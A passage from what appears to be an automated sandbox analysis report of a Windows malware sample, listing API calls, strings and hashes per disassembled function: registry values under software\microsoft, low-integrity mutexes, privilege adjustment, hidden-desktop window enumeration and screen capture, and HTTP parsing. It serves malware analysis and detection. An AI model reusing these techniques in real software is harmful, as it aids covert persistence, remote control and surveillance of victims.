                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,00000104), ref: 012E6A6F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000104), ref: 012E6A7D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CloseOpenValuelstrcpyn
                                                                                                                                                                                                              • String ID: 9E2B3B9Fa$software\microsoft
                                                                                                                                                                                                              • API String ID: 1287607259-2470003939
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(012ECE3A,000000F0,7707BCB0,7707BCB0,00000000), ref: 012EE26B
                                                                                                                                                                                                              • GetLastActivePopup.USER32(012ECE3A,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECE3A,7707BCB0), ref: 012EE279
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012EE293
                                                                                                                                                                                                              • GetWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECE3A,7707BCB0), ref: 012EE296
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 012EE2AC
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000004), ref: 012EE2B5
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012EE2EE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 3748940024-4251816714
                                                                                                                                                                                                              • Opcode ID: a624eef7248241cc834112f5b5d52f7c23b859dace28ac12ad7a7d3622aea454
                                                                                                                                                                                                              • Instruction ID: 0d017fe0d70364faf87f7d2a3560c289b510c5fca9c08821ceb20ee806f754a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a624eef7248241cc834112f5b5d52f7c23b859dace28ac12ad7a7d3622aea454
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6113B32A1022A6AEB32BE9D9C8CFBFB7DCAF40351F810116FB00E3091DA619541C7E4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012ED860,00000000,00000000,00000000,00000101,?,?,012E9D7A,?,?,?,?,012E9F49,00000000), ref: 012ED8A4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,012E9D7A,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400), ref: 012ED8BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,012E9D7A,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?), ref: 012ED8CD
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,012E9D7A,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400), ref: 012ED8DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012ED910
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012ED917
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 012ED92B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 731183410-1167384825
                                                                                                                                                                                                              • Opcode ID: bb83e78b5dbe67d9122c501c0f38c4270613c06f8e80ecc670050c1f151b8206
                                                                                                                                                                                                              • Instruction ID: c838a109481a697cfd9bf782ee65ba0268eb6451125722368d2a72f4467f4d60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb83e78b5dbe67d9122c501c0f38c4270613c06f8e80ecc670050c1f151b8206
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82110831651318ABE730EFA4DC0DFEA37ECAF15711F504168FA08AB2C5C7B066018B94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,9E2B3C2Da,?,?,012E3751), ref: 012E357F
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,012E3751), ref: 012E35ED
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,012E3751,00000000), ref: 012E359F
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(012E3751,?,?,?,?,?,012E3751), ref: 012E35C0
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(9E2B3C2Da,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012E35DD
                                                                                                                                                                                                              • LocalFree.KERNEL32(012E3751,?,?,012E3751), ref: 012E35E7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorToken$CurrentErrorLastOpenProcessThread$AdjustCloseConvertCreateFreeHandleInfoLocalLookupMutexNamedPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                              • String ID: 9E2B3C2Da$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 291819237-2338183320
                                                                                                                                                                                                              • Opcode ID: 1f75c292a3509bd459c2f2373195249503b61b58c10b0a9755026e5937cef06f
                                                                                                                                                                                                              • Instruction ID: 2dad60536998d35bc28ed20a8b21f814bd4cda60a7322b40394f5731c3e4d025
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f75c292a3509bd459c2f2373195249503b61b58c10b0a9755026e5937cef06f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1018471750205BBEB30EFA59C4AFAD77ECAB44B01F504058F705E61C0D6B0A600C765
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(?,?,012FA33F), ref: 012FA147
                                                                                                                                                                                                              • GetTickCount.KERNEL32(?,012FA33F), ref: 012FA159
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,software\microsoft,00000000,00000102,012FA33F,?,012FA33F), ref: 012FA173
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(012FA33F,9e2b3f9ba,00000000,00000004,00000004,00000004,012FA33F), ref: 012FA190
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012FA19A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012FA1A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: #680CloseCountFlushOpenTickValue
                                                                                                                                                                                                              • String ID: 9e2b3f9ba$software\microsoft
                                                                                                                                                                                                              • API String ID: 1556939811-410439933
                                                                                                                                                                                                              • Opcode ID: 627343e544edf9538b1790a982a03219c361e461d16323cac843e302b0436cc8
                                                                                                                                                                                                              • Instruction ID: 32108fe12428d935cd4d1ca0538514110480b5de0a2dbe955177a4ba64d25c87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 627343e544edf9538b1790a982a03219c361e461d16323cac843e302b0436cc8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CF04F75991218FBD720BFA4DD4AEEE777CAB04702F104148FA01E6284D6756B008BE5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E3507
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 012E3519
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,software\microsoft,00000000,00000102,?), ref: 012E3533
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,9e2b3e09a,00000000,00000004,?,00000004,software\microsoft,00000000,00000102,?), ref: 012E3550
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012E355A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E3564
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: #680CloseCountFlushOpenTickValue
                                                                                                                                                                                                              • String ID: 9e2b3e09a$software\microsoft
                                                                                                                                                                                                              • API String ID: 1556939811-554794888
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000), ref: 012EF0CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                              • API String ID: 0-1412996494
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.MSVCRT(00000000,00000004,?,00000000,00000000,00000000,?,?,?), ref: 012E29B7
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E29C5
                                                                                                                                                                                                              • calloc.MSVCRT(00000000,00000004), ref: 012E29CE
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E29DC
                                                                                                                                                                                                              • calloc.MSVCRT(00000000,00000004), ref: 012E29E5
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E29F2
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 012E2B41
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 012E2B69
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012E2B85
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 012E9350
                                                                                                                                                                                                                • Part of subcall function 012E8F20: SelectObject.GDI32(00000000,?,?,00000000,774D3080,012E9231,?,00000006,00000000), ref: 012E8F3A
                                                                                                                                                                                                                • Part of subcall function 012E8F20: DeleteObject.GDI32(?), ref: 012E8F49
                                                                                                                                                                                                                • Part of subcall function 012E8F20: DeleteDC.GDI32(00000000), ref: 012E8F57
                                                                                                                                                                                                                • Part of subcall function 012E8F20: SelectObject.GDI32(?,?), ref: 012E8F67
                                                                                                                                                                                                                • Part of subcall function 012E8F20: DeleteObject.GDI32(?), ref: 012E8F6F
                                                                                                                                                                                                                • Part of subcall function 012E8F20: DeleteDC.GDI32(?), ref: 012E8F78
                                                                                                                                                                                                                • Part of subcall function 012E8F20: GetDC.USER32(00000000,?,00000000,774D3080,012E9231,?,00000006,00000000), ref: 012E8F7C
                                                                                                                                                                                                                • Part of subcall function 012E8F20: CreateCompatibleDC.GDI32(00000000), ref: 012E8F8B
                                                                                                                                                                                                                • Part of subcall function 012E8F20: CreateCompatibleDC.GDI32(00000000), ref: 012E8F93
                                                                                                                                                                                                                • Part of subcall function 012E8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 012E8FB4
                                                                                                                                                                                                                • Part of subcall function 012E8F20: SelectObject.GDI32(?,00000000), ref: 012E8FC3
                                                                                                                                                                                                                • Part of subcall function 012E8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 012E8FDE
                                                                                                                                                                                                                • Part of subcall function 012E8F20: SelectObject.GDI32(00000000,00000000,00000000,01339EB0), ref: 012E8FFD
                                                                                                                                                                                                                • Part of subcall function 012E8F20: ReleaseDC.USER32(00000000,00000000), ref: 012E900C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 012E937C
                                                                                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 012E938B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E939E
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012E93B4
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012E93B7
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,00000000), ref: 012E93C6
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 012E93CF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 012E93DB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4064958368-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdiFlush.GDI32 ref: 012E88B6
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E88C4
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,?), ref: 012E88DA
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(00000000,?), ref: 012E88E6
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?), ref: 012E88F3
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012E8915
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 3485819771-1167384825
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(software\microsoft,00000000,00020119,?), ref: 012F5B18
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9e2b38eea,00000000,?,00000000,?), ref: 012F5B5A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F5B64
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(-80000001), ref: 012F5B2A
                                                                                                                                                                                                                • Part of subcall function 012E3420: #680.SHELL32 ref: 012E3428
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012E345F
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegQueryValueExA.ADVAPI32(?,9e2b3e09a,00000000,?,00000000,?), ref: 012E347C
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegCloseKey.ADVAPI32(?), ref: 012E3486
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 012E34B9
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegQueryValueExA.ADVAPI32(?,9e2b3e09a,00000000,?,00000000,?), ref: 012E34D6
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegCloseKey.ADVAPI32(?), ref: 012E34E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$#680
                                                                                                                                                                                                              • String ID: 9E2B3757a$9e2b38eea$software\microsoft
                                                                                                                                                                                                              • API String ID: 1151197818-1035421039
                                                                                                                                                                                                              • Opcode ID: 65fffda011e86e2d8b71ab748a13139a1b2c13807872d054ef93375e861c0e03
                                                                                                                                                                                                              • Instruction ID: f0c0bf1fb4baed581ab7254ab340fb993bbe369e6dafa7d105628ffb7b69df72
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65fffda011e86e2d8b71ab748a13139a1b2c13807872d054ef93375e861c0e03
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18014075A5020EABDB20EEB8CC45FFEB7BCBB14705F404658F615E7284E67896048BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012EBAAF
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EBAD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EBAE2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 012EBB17
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EBB1E
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 012EBB2E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 1675675969-1167384825
                                                                                                                                                                                                              • Opcode ID: 8c391039a0b3efdd48549529da5acd4c810b33954ab81a20ea08b1515d34947c
                                                                                                                                                                                                              • Instruction ID: 99ce6bef9b91043dc4f80923a4a0cd7e468306303502c4ec14230da50a6deea0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c391039a0b3efdd48549529da5acd4c810b33954ab81a20ea08b1515d34947c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4901F5312052119BD734AF24E80CFD977A8BF45725F5542BDEA019F289D3B159038F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 0130193E
                                                                                                                                                                                                                • Part of subcall function 013059D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                                • Part of subcall function 013059D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                                • Part of subcall function 013059D0: SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                                • Part of subcall function 013059D0: LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 0130195B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 01301962
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01301974
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301985
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 1370207991-373936526
                                                                                                                                                                                                              • Opcode ID: 422561cd0c389765f6e97ef4d87eda6523a5c9328ed96b0eeb9ca08cec9b2d17
                                                                                                                                                                                                              • Instruction ID: 9699867b8ff83ead67ca55f2f55f9b1361c8a548164032dbb5c70953de48880c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 422561cd0c389765f6e97ef4d87eda6523a5c9328ed96b0eeb9ca08cec9b2d17
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EF0E230A52324B7E7327FA99C0EB9FBAEC9F06B19F040158F905A61C0DBE08B0047E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 012FB98E
                                                                                                                                                                                                                • Part of subcall function 013059D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                                • Part of subcall function 013059D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                                • Part of subcall function 013059D0: SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                                • Part of subcall function 013059D0: LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014},00000006), ref: 012FB9AB
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FB9B2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FB9C4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FB9D5
